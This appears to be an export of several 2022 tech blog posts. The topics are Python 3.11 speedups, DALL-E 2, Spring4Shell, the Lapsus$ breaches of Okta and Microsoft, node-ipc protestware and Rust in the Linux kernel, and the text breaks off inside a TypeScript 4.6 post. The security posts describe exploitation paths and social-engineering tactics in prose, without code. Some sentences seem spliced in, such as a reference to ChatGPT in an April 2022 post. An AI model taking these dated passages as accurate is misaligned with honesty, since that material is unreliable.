The Faster CPython project has a multi-release roadmap:\nPython 3.11 (this release): Specializing adaptive interpreter, frame optimizations — targeting 1.25x faster (they\u0026rsquo;re hitting this) Python 3.12: More aggressive specializations, potential for a basic JIT compiler — targeting 2x faster than 3.10 Future releases: Progressively more sophisticated optimization — aspirational target of 5x faster than 3.10 A 5x improvement over the current interpreter would fundamentally change the performance conversation around Python. It wouldn\u0026rsquo;t match C or Rust, but it would put Python in the same ballpark as Java and JavaScript V8 for many workloads — languages that nobody dismisses as \u0026ldquo;too slow for production.\u0026rdquo;\nWhy This Matters Beyond Benchmarks # The performance improvements in Python 3.11 matter for reasons beyond raw execution speed:\nLower barrier for Python in new domains. There are projects today where teams choose Go, Java, or even Node.js over Python specifically because of performance requirements. Narrowing that gap expands the range of problems where Python is a viable choice.\nReduced cloud costs. If your Python Lambda functions or container workloads run 25% faster, that translates directly to reduced compute costs. At scale, this is real money. I\u0026rsquo;ve seen organizations spend significant effort rewriting Python services in Go purely for cost reasons — faster CPython makes that calculus different.\nBetter developer experience. Faster startup means faster test suites, faster CLI tools, and snappier development workflows. 
The cumulative effect on developer productivity is hard to measure but very real.\nMy Take # I\u0026rsquo;ve watched Python\u0026rsquo;s performance story evolve over decades, from the early days when nobody cared about speed because scripts were small, through the era of \u0026ldquo;just use C extensions,\u0026rdquo; to the current moment where Microsoft is funding a multi-year effort to make CPython itself faster. The Python 2 to Python 3 transition showed that the community could move together toward a unified vision, and now that vision includes bringing Python into the performance tier of compiled languages.\nThe Faster CPython project feels like the most promising thing to happen to Python performance since PyPy. The key difference is that these improvements are landing in CPython itself — the reference implementation that 95%+ of Python users actually run. PyPy\u0026rsquo;s performance was always excellent, but the compatibility gaps and ecosystem friction limited its adoption. CPython optimizations have no such barrier — you just upgrade Python and your code gets faster.\nI\u0026rsquo;m cautiously optimistic that the 3.12 and beyond targets are achievable. Mark Shannon\u0026rsquo;s track record and the team\u0026rsquo;s methodical approach — focusing on well-understood optimization techniques rather than moonshot redesigns — gives me confidence.\nIf you\u0026rsquo;re running Python in production, start testing your applications against the 3.11 alphas and betas. The final release is expected in October, and you\u0026rsquo;ll want to be ready to upgrade quickly. 
This is the rare Python release where \u0026ldquo;what\u0026rsquo;s new\u0026rdquo; includes a compelling performance pitch alongside the usual language features.\nThe age of \u0026ldquo;Python is slow, deal with it\u0026rdquo; may finally be coming to an end.\n","date":"14 April 2022","externalUrl":null,"permalink":"/posts/220414-python-311-faster-cpython/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Python 3.11 alpha releases show 10-60% speedups across benchmarks, driven by the Faster CPython project — and this is just the beginning.","title":"Python 3.11 Is Shaping Up to Be Seriously Fast","type":"posts"},{"content":"OpenAI unveiled DALL-E 2 last week, and I have to admit — this one genuinely stopped me in my tracks. As someone who has followed AI research for years and has developed a healthy skepticism toward demo-driven hype, the outputs from DALL-E 2 are in a different league from anything I\u0026rsquo;ve seen before. We\u0026rsquo;re not looking at incremental improvement over the original DALL-E. This is a qualitative leap. The progression from GPT-3\u0026rsquo;s text capabilities to DALL-E 2\u0026rsquo;s image generation, and later to ChatGPT\u0026rsquo;s conversational abilities, shows OpenAI\u0026rsquo;s systematic advancement across modalities.\nDALL-E 2 generates photorealistic images from natural language descriptions at a resolution and coherence level that would have seemed impossible even a year ago. It can also edit existing images, fill in regions based on context, and create variations of an input image — all guided by text prompts. The implications for creative work, software development, and the broader information landscape are profound.\nHow DALL-E 2 Works # The technical approach is fascinating and represents a departure from the original DALL-E\u0026rsquo;s architecture. 
While DALL-E 1 used a discrete variational autoencoder (dVAE) paired with a transformer, DALL-E 2 is built on a diffusion model architecture combined with CLIP (Contrastive Language-Image Pre-Training).\nThe system works in three steps. First, a CLIP text encoder maps the text prompt to an embedding in CLIP\u0026rsquo;s joint text-image space. Then, a \u0026ldquo;prior\u0026rdquo; model generates a CLIP image embedding from the text embedding. Finally, a diffusion decoder generates the actual image from the CLIP image embedding. OpenAI calls the full stack \u0026ldquo;unCLIP\u0026rdquo; because it generates images by inverting the CLIP image encoder.\nThe use of diffusion models is particularly significant. Diffusion models work by learning to reverse a gradual noising process — starting from pure noise and iteratively denoising to produce a coherent image. This approach has been showing remarkable results across the field, with Dhariwal and Nichol\u0026rsquo;s work last year demonstrating that diffusion models could beat GANs on image synthesis quality.\nWhat\u0026rsquo;s impressive about DALL-E 2 is how well it handles compositional prompts — \u0026ldquo;an astronaut riding a horse in a photorealistic style\u0026rdquo; produces exactly what you\u0026rsquo;d expect, with correct spatial relationships, lighting, and perspective. The original DALL-E often struggled with compositionality, producing images that captured individual concepts but fumbled their relationships.\nThe Inpainting and Editing Capabilities # Beyond generation from scratch, DALL-E 2\u0026rsquo;s ability to edit existing images is where things get really interesting from a practical standpoint. 
You can select a region of an image and ask the system to fill it with something new, while maintaining coherence with the surrounding context — shadows, reflections, textures all match naturally.\nThis \u0026ldquo;inpainting\u0026rdquo; capability builds on techniques that have existed in image processing for years, but the quality and semantic understanding here is unprecedented. You\u0026rsquo;re not just doing texture synthesis or content-aware fill — you\u0026rsquo;re telling the system \u0026ldquo;add a flamingo to this living room\u0026rdquo; and getting a result that looks like someone actually photographed a flamingo in that specific room with that specific lighting.\nFor developers building content creation tools, design applications, or any interface that involves image manipulation, this is a technology to watch closely. The API implications alone could reshape how we think about image assets in software development. This represents the multimodal AI future that companies like Google are also pursuing.\nWhat This Means for the Industry # DALL-E 2 is part of a broader wave of multimodal AI systems that can understand and generate across text, images, and eventually other modalities. This capability has significant implications for how we build software and how creative professionals work.\nI see several immediate implications:\nStock photography is facing disruption. If you can generate a photorealistic image of any concept in seconds, the value proposition of stock photo libraries changes fundamentally. Why search through thousands of images for something close to what you need when you can describe exactly what you want?\nDesign workflows will evolve. 
The ability to iterate on visual concepts through natural language — \u0026ldquo;make it more dramatic,\u0026rdquo; \u0026ldquo;change the color palette to warm tones,\u0026rdquo; \u0026ldquo;add a mountain in the background\u0026rdquo; — collapses the iteration cycle for concept art, marketing materials, and UI design from hours to minutes.\nContent moderation becomes harder. Photorealistic AI-generated images at this quality level make it significantly more difficult to distinguish synthetic content from real photographs. The implications for misinformation, fraud, and trust in visual media are concerning.\nAccessibility of visual creation. People who can describe what they want but lack the technical skill to create it in Photoshop or Illustrator suddenly have a powerful tool. This democratization is genuinely exciting, but it also raises questions about the value of visual craftsmanship.\nThe Limitations and Risks # OpenAI is being cautious with DALL-E 2\u0026rsquo;s rollout, and for good reason. The system is currently limited to a small group of trusted users, with guardrails against generating violent, sexual, or politically inflammatory content. It also struggles with certain types of prompts — text rendering within images is still poor, and highly specific technical diagrams or UI layouts aren\u0026rsquo;t within its capabilities.\nThere are also significant ethical and legal questions that haven\u0026rsquo;t been resolved. DALL-E 2 was trained on images scraped from the internet, raising questions about artistic copyright and the rights of creators whose work was used for training. If the system generates an image that closely resembles an existing copyrighted work, who\u0026rsquo;s liable? These questions don\u0026rsquo;t have clear answers yet, and they\u0026rsquo;ll need to be addressed before this technology sees widespread commercial use.\nOpenAI has also acknowledged the risk of bias in generated images. 
The training data reflects existing biases in visual media, which means the system can perpetuate stereotypes in its outputs — for example, generating predominantly white faces for \u0026ldquo;CEO\u0026rdquo; or predominantly male faces for \u0026ldquo;engineer.\u0026rdquo;\nMy Take # I\u0026rsquo;ve been working in tech long enough to have seen many \u0026ldquo;this changes everything\u0026rdquo; moments that turned out to be \u0026ldquo;this changes some things, gradually.\u0026rdquo; But DALL-E 2 feels different to me. The gap between what I expected from AI image generation in 2022 and what DALL-E 2 actually delivers is the largest surprise I\u0026rsquo;ve experienced in recent years.\nWhat excites me most isn\u0026rsquo;t the generation quality — it\u0026rsquo;s the interface. Natural language as a creative tool is incredibly powerful because it meets people where they already are. You don\u0026rsquo;t need to learn Photoshop\u0026rsquo;s tool palette or master digital painting techniques. You just need to be able to describe what you want.\nFor software developers specifically, I\u0026rsquo;d keep a close eye on how OpenAI plans to offer API access. Integrating text-to-image generation into applications — from design tools to e-commerce platforms to documentation systems — could open up entirely new product categories.\nWe\u0026rsquo;re watching the early days of something significant. 
The question isn\u0026rsquo;t whether AI image generation will transform creative workflows — it\u0026rsquo;s how quickly, and what we\u0026rsquo;ll build on top of it.\n","date":"7 April 2022","externalUrl":null,"permalink":"/posts/220407-dall-e-2-ai-image-generation/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s DALL-E 2 produces photorealistic images from text descriptions with stunning accuracy, signaling a paradigm shift in how we think about creative AI.","title":"DALL-E 2 and the New Frontier of AI Image Generation","type":"posts"},{"content":"Just when we thought we could go a few months without a critical framework vulnerability dominating every security channel, Spring4Shell (CVE-2022-22965) has arrived. A remote code execution vulnerability in the Spring Framework — arguably the most widely used Java application framework in the world — was disclosed this week, and the internet immediately went into panic mode with flashbacks to December\u0026rsquo;s Log4Shell disaster.\nBut after spending a couple of days analyzing this one, I think the reality is more nuanced than the catchy name suggests. Let me break down what we actually know.\nWhat\u0026rsquo;s the Vulnerability? # CVE-2022-22965 is a remote code execution (RCE) vulnerability affecting Spring MVC and Spring WebFlux applications running on JDK 9 or later. The vulnerability exploits a class-level data binding mechanism in Spring that, under specific conditions, allows an attacker to modify the class.module.classLoader properties through crafted HTTP requests.\nThe practical exploitation path that\u0026rsquo;s been demonstrated involves manipulating Tomcat\u0026rsquo;s AccessLogValve through the classloader to write a JSP webshell to the server. 
Once the webshell is planted, the attacker has arbitrary command execution on the server.\nSpring has released patches in Spring Framework 5.3.18 and 5.2.20, and Spring Boot 2.6.6 and 2.5.12 include the fixed versions. If you\u0026rsquo;re running Spring in production, stop reading and go patch. I\u0026rsquo;ll wait.\nWhy It\u0026rsquo;s Not Quite Log4Shell # The inevitable comparisons to Log4Shell are understandable — both affect ubiquitous Java frameworks, both enable RCE, and both have catchy names with \u0026ldquo;4\u0026rdquo; and \u0026ldquo;Shell\u0026rdquo; in them. But the actual risk profiles are significantly different:\nThe conditions are more restrictive. The known exploitation requires: (1) Spring MVC or WebFlux, (2) running on JDK 9+, (3) deployed as a WAR to a servlet container like Tomcat, and (4) using Spring\u0026rsquo;s data binding with specific parameter types. That\u0026rsquo;s a meaningful set of prerequisites. Many Spring Boot applications deploy as embedded containers (executable JARs), which changes the exploitation path.\nLog4Shell was trivially exploitable. A single crafted string in any log message could trigger the vulnerability. Spring4Shell requires more targeted exploitation — the attacker needs to know or guess specific endpoint parameters and the application\u0026rsquo;s data binding configuration.\nThe attack surface is narrower. Log4Shell could be triggered through any input that ended up in a log statement — HTTP headers, form fields, query parameters, you name it. Spring4Shell requires specific HTTP request parameters that map to Spring\u0026rsquo;s data binding.\nThis doesn\u0026rsquo;t mean you should ignore it. It means you should prioritize patching without succumbing to the same level of all-hands-on-deck panic that Log4Shell warranted.\nThe Confusing Disclosure Timeline # One of the frustrating aspects of this vulnerability has been the messy disclosure process. 
The CVE was initially confused with a separate Spring Cloud Function vulnerability (CVE-2022-22963), leading to widespread confusion in the first 24 hours. Proof-of-concept code was circulating on Chinese social media before the official advisory was published, and early reports mixed up the two issues.\nThis led to a situation where some organizations patched for the wrong vulnerability, while others dismissed the whole thing as overblown FUD. Neither response was correct.\nThe confusion was compounded by the fact that there was also a critical zero-day in Spring Cloud Gateway (CVE-2022-22947) disclosed around the same time. Three Spring-related CVEs in quick succession, all with similar numbering, all affecting different components. It\u0026rsquo;s been a rough week for anyone maintaining Spring-based infrastructure.\nPractical Remediation Steps # Here\u0026rsquo;s what I\u0026rsquo;d recommend, in order of priority:\n1. Patch immediately. Upgrade to Spring Framework 5.3.18+ or 5.2.20+, or Spring Boot 2.6.6+ / 2.5.12+. This is the definitive fix.\n2. If you can\u0026rsquo;t patch today, apply the workaround. Spring has documented a workaround using @ControllerAdvice to set DataBinder.setDisallowedFields() for class.*, Class.*, *.class.*, and *.Class.*. This prevents the property binding path that enables exploitation.\n3. Check your JDK version. If you\u0026rsquo;re still on JDK 8 (and plenty of production systems are), you\u0026rsquo;re not affected by the known exploitation path. That said, don\u0026rsquo;t let this be a reason to delay patching — other exploitation paths may emerge.\n4. Review your WAF rules. Many WAF vendors have already published rules to detect Spring4Shell exploitation attempts. Adding these as a defense-in-depth layer buys you time while patching works through your deployment pipeline.\n5. Monitor for indicators of compromise. 
Look for unusual JSP files appearing in your web application directories, unexpected outbound connections from application servers, and web server access logs with suspicious parameter patterns targeting classloader properties.\nThe Bigger Picture: Framework Security Fatigue # What concerns me most isn\u0026rsquo;t this specific vulnerability — it\u0026rsquo;s the pattern. Log4Shell in December, and now Spring4Shell in March. Two of the most fundamental pieces of the Java ecosystem, both with critical RCE vulnerabilities, discovered within four months of each other.\nThe Java ecosystem\u0026rsquo;s heavy reliance on reflection, dynamic class loading, and runtime binding has always been a double-edged sword. These features enable the powerful framework abstractions that make Spring so productive, but they also create attack surfaces that are difficult to reason about and easy to overlook.\nI\u0026rsquo;ve been writing Java professionally since the late 1990s, and the framework surface area has grown enormously. A modern Spring Boot application pulls in dozens of auto-configured components, each with their own assumptions about data binding, serialization, and request handling. The total attack surface is vast, and much of it is invisible to application developers who just want to write business logic.\nMy Take # Patch this, but don\u0026rsquo;t panic. Spring4Shell is serious, but it\u0026rsquo;s not the same class of catastrophe as Log4Shell. The exploitation conditions are more specific, the blast radius is more contained, and patches are already available.\nWhat I hope comes out of this is a renewed focus on secure-by-default configurations in major frameworks. Spring\u0026rsquo;s data binding is powerful, but the ability to bind arbitrary request parameters to internal class properties should never have been accessible without explicit opt-in. 
The principle of least privilege should apply to framework features, not just user permissions.\nIn the meantime, update your dependencies and make sure your vulnerability scanning pipeline can detect this. And maybe pour one out for the Spring security team, who I imagine haven\u0026rsquo;t slept much this week.\n","date":"31 March 2022","externalUrl":null,"permalink":"/posts/220331-spring4shell-cve-2022-22965/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical RCE vulnerability in Spring Framework has the internet in panic mode, but the actual risk profile is more nuanced than the Log4Shell comparisons suggest.","title":"Spring4Shell Is Here — Assessing the Real Risk of CVE-2022-22965","type":"posts"},{"content":"If you work in enterprise software — and especially if you\u0026rsquo;re responsible for authentication infrastructure — this has been a very uncomfortable week. The Lapsus$ hacking group, which has been on a remarkable tear over the past few months, has now confirmed breaches of both Microsoft and Okta, two of the most critical identity and access management providers in the industry.\nThe Okta breach is particularly alarming. Okta provides single sign-on and identity services to over 15,000 organizations. A compromise here doesn\u0026rsquo;t just affect Okta — it potentially affects every downstream customer. This is the identity provider nightmare scenario that security architects have warned about for years.\nThe Okta Situation # On March 22, Lapsus$ posted screenshots on Telegram appearing to show access to Okta\u0026rsquo;s internal systems, including what looked like Okta\u0026rsquo;s Superuser/Admin portal and Slack channels. 
Okta\u0026rsquo;s initial response was that the breach was related to a January 2022 security incident involving a third-party contractor, Sitel (which provides customer support services for Okta), and that the impact was limited.\nAccording to Okta\u0026rsquo;s initial statement, approximately 2.5% of their customers — roughly 375 organizations — may have been affected. The access was reportedly limited to what a support engineer could see and do, which still includes the ability to reset passwords and MFA tokens for customer accounts.\nLet that sink in. A third-party support contractor\u0026rsquo;s compromised account could potentially reset authentication for hundreds of enterprise customers. This is not a theoretical attack — it happened, and the blast radius is enormous.\nMicrosoft\u0026rsquo;s Breach # Microsoft confirmed that Lapsus$ gained \u0026ldquo;limited access\u0026rdquo; to their systems, with the group claiming to have exfiltrated source code from Bing, Bing Maps, and Cortana. Microsoft\u0026rsquo;s blog post (they track the group as DEV-0537) detailed the group\u0026rsquo;s tactics: social engineering, SIM swapping, and targeting personal accounts of employees to find credentials that might provide corporate access.\nWhat strikes me about the Microsoft breach is the group\u0026rsquo;s brazenness. They posted a screenshot of what appeared to be an Azure DevOps instance containing Microsoft source code repositories while they still had access. Microsoft says they shut down the access mid-operation, and that no customer data was compromised. The leaked source code, while embarrassing, doesn\u0026rsquo;t necessarily constitute a critical security risk given that much of Microsoft\u0026rsquo;s security model doesn\u0026rsquo;t rely on source code secrecy.\nThe Lapsus$ Playbook # What\u0026rsquo;s fascinating — and terrifying — about Lapsus$ is their methodology. This isn\u0026rsquo;t a nation-state APT using zero-days and custom malware. 
Their playbook is almost entirely based on social engineering and identity compromise:\nRecruit insiders. Lapsus$ has openly advertised on Telegram for employees at target companies willing to provide VPN credentials, remote access, or other initial footholds. They reportedly pay well.\nSIM swapping. By convincing mobile carriers to transfer a target\u0026rsquo;s phone number to an attacker-controlled SIM, they can intercept SMS-based MFA codes. This effectively bypasses one of the most common second-factor authentication methods.\nCredential harvesting. They target personal email accounts and devices, looking for corporate credentials that employees have saved or synced outside of corporate security boundaries.\nMFA fatigue attacks. Repeatedly sending MFA push notifications until the target gives up and approves one, typically in the middle of the night. I\u0026rsquo;ve seen this technique described before, but Lapsus$ appears to have operationalized it at scale.\nNone of these techniques are novel. But the combination, executed with speed and audacity against high-profile targets, has proven remarkably effective.\nWhat This Means for Identity Architecture # The Okta breach forces a reckoning with how we think about identity provider security. We\u0026rsquo;ve spent years consolidating authentication through providers like Okta, Azure AD, and Auth0, and for good reason — centralized identity management is far better than every application rolling its own auth. But centralization creates concentration risk.\nA few things I\u0026rsquo;m thinking about:\nThird-party access is your attack surface. Okta wasn\u0026rsquo;t breached through their core engineering team — it was through a support contractor. Every organization that provides elevated access to vendors, contractors, or support partners needs to reassess. What can those accounts see? What actions can they take? 
Are they monitored with the same rigor as internal privileged accounts?\nSMS-based MFA is not enough. If Lapsus$ can defeat SMS MFA through SIM swapping, and push-notification MFA through fatigue attacks, we need to be moving toward phishing-resistant authenticators. FIDO2/WebAuthn security keys and platform authenticators (Windows Hello, Touch ID) are significantly harder to compromise because they\u0026rsquo;re bound to a specific origin and device.\nZero trust isn\u0026rsquo;t just a marketing term. The principle that no access should be implicitly trusted based on network location is exactly the kind of architecture that limits blast radius. Even if an attacker gets valid credentials, every access request should be evaluated based on device posture, behavioral signals, and least-privilege principles.\nMy Take # I\u0026rsquo;ve been building and advising on authentication systems for a long time, and the Okta situation is a wake-up call that many of us needed. We\u0026rsquo;ve gotten comfortable treating our identity provider as a trusted black box — plug it in, enable SSO, check the compliance checkbox. But who watches the watchers?\nThe uncomfortable truth is that Lapsus$ isn\u0026rsquo;t doing anything technically sophisticated. They\u0026rsquo;re exploiting the human layer — the same layer we\u0026rsquo;ve always known is the weakest link. The difference is they\u0026rsquo;re doing it systematically and at scale against the providers we depend on most.\nMy immediate advice: audit your identity provider\u0026rsquo;s support and contractor access model. Enable FIDO2 wherever possible. Implement conditional access policies that limit what even authenticated users can do based on context. 
And have a response plan for the scenario where your identity provider itself is compromised — because that scenario is no longer hypothetical.\nThis is going to be a long year for identity security.\n","date":"24 March 2022","externalUrl":null,"permalink":"/posts/220324-lapsus-group-okta-microsoft-breach/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Lapsus$ hacking group has breached both Okta and Microsoft, exposing critical weaknesses in identity provider security and third-party access management.","title":"Lapsus$ Breaches Okta and Microsoft — The Identity Provider Nightmare","type":"posts"},{"content":"This week, the JavaScript ecosystem was hit by something I\u0026rsquo;ve never seen in my three decades of software development: a popular open source maintainer deliberately weaponizing their own package. The node-ipc library — downloaded over a million times per week and a transitive dependency of major tools like Vue CLI — was found to contain malicious code targeting users with Russian and Belarusian IP addresses.\nThe maintainer, RIAEvangelist, pushed updates that would overwrite files with heart emojis on systems geolocated to Russia or Belarus, in protest against the ongoing invasion of Ukraine. While the political sentiment may be understandable, the implications for software supply chain security are deeply troubling.\nWhat Actually Happened # The timeline is worth examining carefully. On March 7, a patch release in the 10.1.x line of node-ipc was published with code that checked the user\u0026rsquo;s external IP address against geoIP databases. If the system was located in Russia or Belarus, the code would recursively traverse the filesystem and replace file contents with a heart emoji (❤️). Version 11.0.0, released shortly afterwards, toned this down to simply creating a file called WITH-LOVE-FROM-AMERICA.txt on the desktop.\nThe malicious code was obfuscated using base64 encoding — a deliberate attempt to hide the payload from casual code review. 
Versions 10.1.1 and 10.1.2 were also affected, which is particularly dangerous because they sit within a semver range that many projects would auto-update to.\nThe Snyk advisory classified this as CVE-2022-23812, and it was quickly flagged across the ecosystem. But the damage window was real — anyone running npm install or npm update on affected projects during that period could have pulled in destructive code.\nThe Supply Chain Trust Problem # I\u0026rsquo;ve written about npm supply chain issues before, and every time I think we\u0026rsquo;ve hit peak concern, something new comes along. The event-stream incident in 2018 involved a malicious actor taking over an abandoned package. The ua-parser-js hijacking last year was a compromised maintainer account. But this? This is the actual maintainer deliberately inserting destructive code into their own widely-used package.\nThat\u0026rsquo;s a fundamentally different threat model. We\u0026rsquo;ve built our entire dependency ecosystem on the assumption that maintainers act in good faith. Package signing, two-factor authentication, provenance tracking — none of these help when the threat actor has legitimate commit access and is the recognized owner of the package.\nThe Vue CLI team had to scramble to pin their node-ipc dependency to a safe version. Any project using node-ipc transitively — and there are thousands — was potentially affected. This is the tyranny of deep dependency trees that the Node.js ecosystem has always struggled with.\nWhat Can We Actually Do? # The knee-jerk reaction is to call for more vetting of open source maintainers, but that misses the point. You can\u0026rsquo;t pre-screen someone\u0026rsquo;s future political motivations or emotional state. The real solutions are structural:\nLock your dependencies. If you\u0026rsquo;re not using lockfiles (package-lock.json, yarn.lock, pnpm-lock.yaml) and committing them to version control, you\u0026rsquo;re playing Russian roulette with every install. 
Lockfiles won\u0026rsquo;t protect you from a compromised initial install, but they prevent silent updates from pulling in new malicious versions.\nUse npm audit and automated scanning. Tools like Snyk, Socket, and npm\u0026rsquo;s built-in audit can flag known vulnerabilities, including this one once it was cataloged. The gap between publication and detection is the danger zone.\nMinimize your dependency tree. I know this sounds like the old \u0026ldquo;just write it yourself\u0026rdquo; argument, but it\u0026rsquo;s more nuanced than that. Do you really need a library for something your platform provides natively? The Node.js standard library has grown significantly — node:fs, node:crypto, node:http2 are all mature. Every dependency you don\u0026rsquo;t take is one less trust decision.\nConsider dependency review workflows. GitHub\u0026rsquo;s dependency review action can flag new dependencies in pull requests. It won\u0026rsquo;t catch everything, but it adds a human checkpoint before new packages enter your supply chain.\nThe Ethics Question Nobody Wants to Discuss # There\u0026rsquo;s a broader conversation happening in the open source community right now about whether it\u0026rsquo;s acceptable to use your software as a form of protest or sanction. The Open Source Initiative has been clear that open source licenses are, by definition, non-discriminatory — they can\u0026rsquo;t restrict usage by geography, purpose, or person.\nBut licenses and ethics aren\u0026rsquo;t the same thing. Some developers are arguing that maintainers have the right — maybe even the obligation — to use whatever leverage they have against what they see as injustice. Others, myself included, worry about the precedent. If we accept supply chain sabotage as legitimate protest, we\u0026rsquo;ve opened a door that can\u0026rsquo;t be closed. Who decides which causes justify weaponizing code? 
What happens when someone with a less universally sympathized-with cause does the same thing?\nMy Take # I have enormous sympathy for anyone affected by the war in Ukraine, and I understand the impulse to use whatever tools you have at your disposal. But as someone who has spent decades building systems that depend on trust in the software supply chain, I can\u0026rsquo;t endorse this approach.\nThe node-ipc incident didn\u0026rsquo;t just affect Russian systems — it affected the trust model of the entire npm ecosystem. It gave every CISO and procurement officer another reason to be wary of open source dependencies. And it made the already thankless job of open source maintenance even harder for everyone else.\nWhat I want to see come out of this is not more finger-pointing, but better tooling. We need reproducible builds, better provenance tracking, and runtime sandboxing for dependencies. Deno\u0026rsquo;s permission model is looking more prescient by the day — imagine if node-ipc had to explicitly request filesystem write access.\nThe open source ecosystem is one of the great achievements of our industry. Let\u0026rsquo;s not let it become a battlefield.\n","date":"17 March 2022","externalUrl":null,"permalink":"/posts/220317-node-ipc-protestware-supply-chain/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A popular npm package was deliberately sabotaged by its own maintainer, raising urgent questions about supply chain trust in open source.","title":"The node-ipc Protestware Incident — When Open Source Becomes a Weapon","type":"posts"},{"content":"The Rust for Linux project has been quietly building momentum, and the latest patch series submitted to the Linux Kernel Mailing List (LKML) makes it clear this isn\u0026rsquo;t going away. 
Miguel Ojeda and the team have been steadily addressing reviewer feedback, improving the integration points between Rust and the kernel\u0026rsquo;s C infrastructure, and demonstrating that memory-safe systems programming in the kernel isn\u0026rsquo;t just theoretically possible — it\u0026rsquo;s practically achievable.\nWhy the Kernel Needs Rust # Let\u0026rsquo;s start with the fundamental motivation. A significant percentage of kernel vulnerabilities — Google\u0026rsquo;s security team has consistently cited around 70% — stem from memory safety issues. Buffer overflows, use-after-free bugs, null pointer dereferences, data races. These are the classes of bugs that Rust\u0026rsquo;s ownership model and borrow checker are specifically designed to prevent at compile time.\nThe Linux kernel is roughly 30 million lines of C code, maintained by thousands of developers with varying levels of experience. The evolution of Rust adoption shows how this trend accelerated. Even the best C programmers make memory safety mistakes — the cognitive overhead of manual memory management in complex concurrent code is enormous. I\u0026rsquo;ve written my share of C over the decades, and I\u0026rsquo;ll be the first to admit that the language makes it far too easy to introduce subtle memory bugs that might not manifest until years later under specific conditions.\nRust doesn\u0026rsquo;t eliminate all bugs, but it eliminates entire categories of them. In a codebase as critical as the Linux kernel, that\u0026rsquo;s transformational.\nHow the Integration Works # The Rust for Linux approach is pragmatic and well-designed. Nobody is proposing rewriting the kernel in Rust — that would be absurd for a 30-year-old codebase. Instead, the project enables writing new kernel modules and drivers in Rust, with safe abstractions over the existing C kernel APIs.\nThe architecture uses a layered approach. 
At the bottom, unsafe Rust bindings interact directly with kernel C functions through bindgen-generated interfaces. On top of those, safe Rust abstractions provide idiomatic APIs that kernel developers can use without writing unsafe code. A new driver author can work entirely in safe Rust while the underlying bindings handle the C interop.\nThis is the right approach. You get the safety benefits for new code without the impossible task of rewriting existing subsystems. Later kernel releases showcased continued Rust integration. Over time, as drivers are updated or new ones written, the proportion of memory-safe code in the kernel naturally increases.\nThe toolchain integration has also matured significantly. The project uses a specific version of the Rust compiler (currently targeting nightly, with plans to move to stable releases once certain features are stabilized), and the build system integration with Kbuild is surprisingly clean. You can configure which Rust support to enable alongside your normal kernel configuration.\nThe Cultural Shift # Perhaps more interesting than the technical work is the cultural shift happening within the kernel community. Linus Torvalds has expressed openness to merging Rust support, which is a significant signal. The kernel community is famously conservative — and for good reason, given the stability requirements — but there\u0026rsquo;s growing recognition that the status quo on memory safety isn\u0026rsquo;t sustainable.\nNot everyone is on board, of course. Some veteran kernel developers have expressed concerns about adding a second language to the kernel, the learning curve for maintainers, and the complexity of debugging across language boundaries. These are legitimate concerns. Maintaining a mixed C/Rust codebase requires developers who understand both languages and the interaction between them.\nBut I think the trajectory is clear. 
The industry is moving toward memory-safe systems programming languages, and the kernel can either lead that transition or be dragged into it. The QUIC protocol adoption demonstrates how new protocols benefit from memory-safe implementations. Android has already committed to Rust for new platform code, and Microsoft has been experimenting with Rust in Windows components. The major OS vendors are converging on the same conclusion.\nWhat This Means for Developers # Even if you never write kernel code, the Rust-in-Linux effort matters for a few reasons.\nFirst, it validates Rust as a systems programming language for the most demanding environment possible. If Rust is good enough for the Linux kernel, it\u0026rsquo;s good enough for your systems work.\nSecond, the abstractions being developed for kernel use are pushing Rust\u0026rsquo;s type system and unsafe code patterns into new territory. The techniques being pioneered here — safe wrappers over C APIs, compile-time resource management for hardware interactions, zero-cost abstractions for kernel primitives — will eventually benefit the broader Rust ecosystem.\nThird, and most practically, a kernel with more memory-safe code means fewer kernel vulnerabilities, fewer CVEs, fewer emergency patches, and more stable systems for everyone running Linux. That\u0026rsquo;s every cloud server, every Android phone, every embedded device, every container in your Kubernetes cluster.\nMy Take # I\u0026rsquo;ve watched programming language debates come and go. Usually they\u0026rsquo;re about developer productivity or ecosystem size or syntax preferences. 
The Rust conversation is fundamentally different because it\u0026rsquo;s about correctness — specifically, the kind of correctness that prevents security vulnerabilities and system crashes.\nThe Rust for Linux project represents something I find genuinely exciting: a pragmatic, incremental path to meaningfully improving the security and stability of the most important software on the planet. It\u0026rsquo;s not revolutionary in its approach — it\u0026rsquo;s evolutionary, which is exactly what makes it likely to succeed.\nI\u0026rsquo;ve been writing more Rust in my own work over the past year, primarily for CLI tools and service components where performance and reliability matter. The learning curve is real, but the compiler\u0026rsquo;s guarantees fundamentally change how I think about code correctness. Seeing those same guarantees heading into the kernel feels like the beginning of a long-overdue shift.\nIf you\u0026rsquo;re a systems programmer who hasn\u0026rsquo;t tried Rust yet, the kernel project is another strong signal that now is the time. The language, tooling, and ecosystem have matured enough that the investment pays dividends. Start with something small — a CLI tool, a data processing pipeline — and let the borrow checker teach you a new way of thinking about memory and ownership. Your future self will thank you.\n","date":"10 March 2022","externalUrl":null,"permalink":"/posts/220310-rust-linux-kernel-progress/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Rust for Linux project continues gaining momentum with updated patch series and growing support from kernel maintainers. Memory safety in the kernel is getting real.","title":"Rust in the Linux Kernel — From Experiment to Inevitability","type":"posts"},{"content":"TypeScript 4.6 landed this week, and while it\u0026rsquo;s not a headline-grabbing release, it\u0026rsquo;s one of those updates that makes day-to-day development genuinely smoother. 
The TypeScript team continues their steady cadence of releases that chip away at the rough edges of the type system, and this one includes several improvements I\u0026rsquo;ve been wanting for a while. This follows the trajectory from TypeScript 4.1\u0026rsquo;s template literal types toward increasingly sophisticated type safety. You can read the full announcement on the TypeScript blog.\nControl Flow Analysis Improvements # The biggest quality-of-life improvement in 4.6 is better control flow analysis for destructured discriminated unions. If that sounds academic, let me show you why it matters.\nPreviously, TypeScript could narrow types based on discriminant properties when you accessed them directly on an object, but it lost track of the relationship once you destructured. So if you had a discriminated union like { kind: \u0026quot;success\u0026quot;, data: string } | { kind: \u0026quot;error\u0026quot;, message: string } and you destructured kind and data/message, the compiler couldn\u0026rsquo;t connect the check on kind to the narrowing of the other fields. This pattern is fundamental to modern TypeScript code.\nIn 4.6, this just works. You can destructure, check the discriminant, and TypeScript correctly narrows the other variables. This is huge for patterns that are common in Redux reducers, API response handlers, and event 